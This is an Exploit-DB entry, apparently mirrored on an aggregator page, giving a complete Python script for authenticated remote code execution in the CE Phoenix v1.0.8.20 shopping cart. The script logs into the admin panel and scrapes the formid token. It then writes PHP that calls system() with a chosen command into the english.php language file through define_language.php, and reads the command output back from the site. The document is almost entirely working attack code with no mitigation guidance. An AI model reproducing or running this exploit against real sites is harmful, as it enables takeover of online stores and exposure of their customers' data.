CE Phoenix v1.0.8.20 – Remote Code Execution

  • 作者: tmrswrr
    日期: 2024-04-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51957/
  • ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
    #### Date: 2023-11-25
    #### Exploit Author: tmrswrr
    #### Category: Webapps
    #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
    #### Version: v1.0.8.20
    #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
    
    ## EXPLOIT :
    
    import requests
    from bs4 import BeautifulSoup
    import sys
    import urllib.parse
    import random
    from time import sleep
    
    class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'
    
     
    def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
    colors.CRED, colors.CBEIGE]
    random.shuffle(color_random)
    
    banner = color_random[0] + """
     CE Phoenix v1.0.8.20 - Remote Code Execution \n
     Author: tmrswrr
    """
    for char in banner:
    print(char, end='')
    sys.stdout.flush()
    sleep(0.0045)
    
    def get_formid_and_cookies(session, url):
    response = session.get(url, allow_redirects=True)
    if response.ok:
    soup = BeautifulSoup(response.text, 'html.parser')
    formid_input = soup.find('input', {'name': 'formid'})
    if formid_input:
    return formid_input['value'], session.cookies
    return None, None
    
    def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")
    
     
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
    print("[-] Failed to retrieve initial formid.")
    return
    
    # Login
    print("[+] Performing login...")
    login_payload = {
    'formid': formid,
    'username': username,
    'password': password
    }
    login_headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
    'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
    
    if not login_response.ok:
    print("[-] Login failed.")
    print(login_response.text)
    return
    
    print("[+] Login successful.")
    
    
    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
    print("[-] Failed to retrieve new formid after login.")
    return
    
    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
    'Referer': login_response.url
    }
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
    
    if exploit_response.ok:
    print("[+] Exploit executed successfully.")
    else:
    print("[-] Exploit failed.")
    print(exploit_response.text)
    
    
    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)
    
    def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)
    
    if __name__ == "__main__":
    entry_banner()
    
    if len(sys.argv) < 5:
    print("Usage: python script.py [URL] [username] [password] [command]")
    sys.exit(1)
    
    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]
    
    main(base_url, username, password, command)